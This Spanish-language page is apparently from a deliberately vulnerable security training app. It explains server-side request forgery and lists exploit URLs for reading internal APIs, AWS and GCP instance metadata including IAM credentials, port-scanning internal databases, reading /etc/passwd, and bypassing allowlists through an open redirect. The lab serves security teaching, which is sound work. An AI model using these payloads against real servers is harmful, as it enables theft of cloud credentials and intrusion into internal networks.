CRITICAL

SSRF — Server-Side Request Forgery

El servidor realiza peticiones HTTP a URLs arbitrarias proporcionadas por el usuario, exponiendo servicios internos y metadatos cloud

Ejemplos de explotación:

Acceso a API interna

Leer la API de usuarios interna que no debería ser accesible externamente

/api/lab/ssrf?url=http://localhost:3001/api/users
Acceso a system-info interno

Obtener info del sistema a través del servidor

/api/lab/ssrf?url=http://localhost:3001/api/system-info
AWS IMDS — metadatos de instancia

Acceder al servicio de metadatos de AWS (169.254.169.254) para obtener credenciales IAM

/api/lab/ssrf?url=http://169.254.169.254/latest/meta-data/
AWS IMDS — credenciales IAM

Extraer el rol IAM y sus credenciales temporales de acceso

/api/lab/ssrf?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
GCP Metadata Service

Metadatos en Google Cloud Platform (requiere header Metadata-Flavor)

/api/lab/ssrf?url=http://metadata.google.internal/computeMetadata/v1/
Port scan — localhost:6379 (Redis)

Detectar Redis expuesto en loopback midiendo el tiempo de respuesta

/api/lab/ssrf?url=http://127.0.0.1:6379
Port scan — localhost:5432 (PostgreSQL)

Detectar base de datos PostgreSQL interna

/api/lab/ssrf?url=http://127.0.0.1:5432
Port scan — localhost:27017 (MongoDB)

Detectar MongoDB sin autenticación

/api/lab/ssrf?url=http://127.0.0.1:27017
File scheme — /etc/passwd

En servidores mal configurados, file:// permite leer archivos locales

/api/lab/ssrf?url=file:///etc/passwd
SSRF via Open Redirect interno

Combinar SSRF con un Open Redirect para evadir allowlists de dominio

/api/lab/ssrf?url=http://localhost:3001/api/lab/open-redirect?to=http://169.254.169.254/

Vulnerabilidad Crítica

El endpoint acepta cualquier URL en el parámetro ?url= y realiza la petición desde el servidor sin validación. Esto permite a un atacante acceder a servicios internos de la red privada, metadatos de instancias cloud (AWS IMDS, GCP Metadata), bases de datos internas, y en casos extremos leer archivos del sistema con el esquema file://. OWASP A10:2021 — CVSS 9.8.

Esta aplicación es vulnerable por diseño - Solo para propósitos educativos

© 2025 Aitana Security Lab